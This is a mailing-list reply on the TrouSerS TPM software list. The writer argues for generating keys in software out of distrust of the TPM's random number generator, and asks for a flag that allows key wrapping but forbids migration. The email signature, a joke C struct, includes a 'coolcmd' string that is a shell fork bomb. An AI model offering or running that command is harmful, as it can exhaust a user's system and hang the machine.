On 2 January 2014 14:46, Ken Goldman <[email protected]> wrote:
>> Yeah it makes sense, but it misses the (according to me) valid use
>> case of only allowing one-way migration. It would be nice if it'd had
>> another bit signifying that.
> There is no way for the TPM to enforce (and therefore be able to
> certify) one way migration. Once a private key is migrated off a TPM,
> or if the private key was originally created off the TPM, the TPM loses
> control. It can go anywhere.
>
> What additional assurance could your 'second bit' give?
Ideally I'd want to generate my key on the TPM chip as non-migratable.
But I have a concern that the RNG on the TPM chip could be flawed,
even if I StirRandom. Say for example that it's deliberately weakened.
If I set up a secure environment, for example by booting off a USB
stick in a secure room, then I can verify that my RSA keys have enough
entropy, and they actually are the keys used later on with the TPM
chip (I can sample this, since I want to destroy the production
in-software private keys as soon as possible).
For all I know the TPM chip uses Dual_EC whatever, which is treated by
the industry as being backdoored. Sure, maybe the specs say that it
isn't doing that, but how would I check? I don't even have access to P
and Q. It's easier to verify a software RNG.
So by (carefully) generating the keys in software I can trust the
quality of the keypair, but without this 'second bit' I compromise
security by allowing the key to be exported. When this 'second bit' is
set Key_WrapKey (or rather, its underlying TPM operation) would be
allowed, but the key migration commands would not.
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "[email protected]" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt"; };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
------------------------------------------------------------------------------
Rapidly troubleshoot problems before they affect your business. Most IT
organizations don't have a clear picture of how application performance
affects their revenue. With AppDynamics, you get 100% visibility into your
Java,.NET, & PHP application. Start your 15-day FREE TRIAL of AppDynamics Pro!
http://pubads.g.doubleclick.net/gampad/clk?id=84349831&iu=/4140/ostg.clktrk
_______________________________________________
TrouSerS-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/trousers-users
